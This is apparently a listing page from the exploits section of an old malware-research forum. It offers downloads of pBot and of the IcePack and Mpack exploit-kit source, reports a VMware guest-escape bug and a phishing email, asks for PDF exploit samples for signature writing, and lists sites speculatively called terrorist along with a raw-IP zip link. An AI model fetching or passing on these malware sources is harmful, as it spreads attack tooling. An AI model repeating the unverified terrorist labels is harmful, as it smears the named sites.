Skip navigation.
Home

Exploits

pBot - PHP Remote File Include Bug - Web based / PHP bot

|

Speaking about PHP RFI vulns, this is a classic example.

This is a web-based bot that uses PHP as it's base, and is similar to BlackEnergy DDoS bot in terms of operating out of the web.

OC Download pBot Source code (rename extension to .rar)
Here's the Rapidshare Mirror

Cheers :)
Kish

VMware Vulnerability: Time to Upgrade

Core Security found a pretty spectacular vulnerability in Vmware. If you have shared folders with the guest OS a program running inside the VM can modify any file on the host. Given how dependent we are on VMs for malware analysis it would be a good idea to upgrade. Hats off to Core for finding this bug.

"A vulnerability was found in VMware's shared folders mechanism that grants users of a Guest system read and write access to any portion of the Host's file system including the system folder and other security-sensitive files. Exploitation of this vulnerability allows attackers to break out of an isolated Guest system to compromise the underlying Host system that controls it."

Not detected yet!?

While checking my email yesterday at Hotmail I got an email from a nicole smith. The email was an attachment of what appeared to be a valid jpg file: "nicole256.jpg". When I put my mouse on the image I noticed the link on the status bar was not to the "nicole256.jpg" file but instead to another site "hxxp://201.241.111.30/pics/nicole256.php". needless to say, it was a spoofed link to an "exe" file. I downloaded the file and scanned it with avp kav 7.0 with the very latest definitions and it found nothing. Nope, not even as suspicious. I have included 3 screenshots: what appeared as a suspicious string of the source code of the hotmail page and 2 screen captures of the scan from virus total, several scanners did register it as malware and a couple as suspicious. Is this a new technique/method of infecting? For a long time now, hotmail had always restricted almost all attachments but this one seemed to get by with no problem.

Anyone have a sample of the latest PDF exploit?

| | |

I'm looking to write snort and clamav signatures for it, but have yet to find a sample.

Possible Terrorist Website ?

Just found out this blog, and I have a strong intuition that this belongs to a terrorist group (mujahideen / taliban / al-qaeda) ??

Check it out if your just as curious

Few more sites found ...

http://naseeha.wordpress.com/
http://moderatesrefuted.wordpress.com/
http://truthline.wordpress.com/
http://alkarnee.wordpress.com/

and a terrorist magazine: http://202.75.33.137/uploads/teaqny_magazine1.zip

Update: Will try to add random terrorist encryption tools download if I get my hands on them in a while ...

Cheers :)
Kish

The basics of Remote File Inclusion

Many people have heard of it, seen it, and may have tried it.. But do they really know what it does? Because there are still a lot of people who do not know what RFI (Remote File Inclusion) actually is, or does, I have decided to write a little(?) tutorial about it. It will basically just explain and 'show' how RFI actually works, and help you understand the basics.

After reading this, you should be able to recognize RFI's, and you will be able to find and use it. At least, that's what I think.

Since this is my first 'tutorial', I would like to have your opinion on it, so leave me a comment.

- KnickLighter's Tutorial

IcePack Toolkit - Source code - Platinum Edition

|

Uploaded to rapidshare.de as usual, this is just another toolkit like Mpack, but less known. Password is "infected"

OC Download Icepack Source code (rename extension to .rar)
Rapidshare Mirror

Cheers :)
Kish

Mpack Toolkit - Source code

|

The Mpack toolkit has been uploaded to rapidshare. I searched the database and found only the dreamhack tool (the compiled form) and I thought it would make sense to upload the source for our members ;)

Click here to download the source code from Rapidshare
OC Download c0ff6e3db8afa6bf598e54afe351d795 (rename extension to .rar)

Password: "infected"

Just tried it on a machine, the contents of the archive are,

MS07-060 / Word 2002 Exploit

Anyone have a copy of this yet ?

V.

PDF 0day

Anyone have a sample of the new PDF windows 0day?

V.

Syndicate content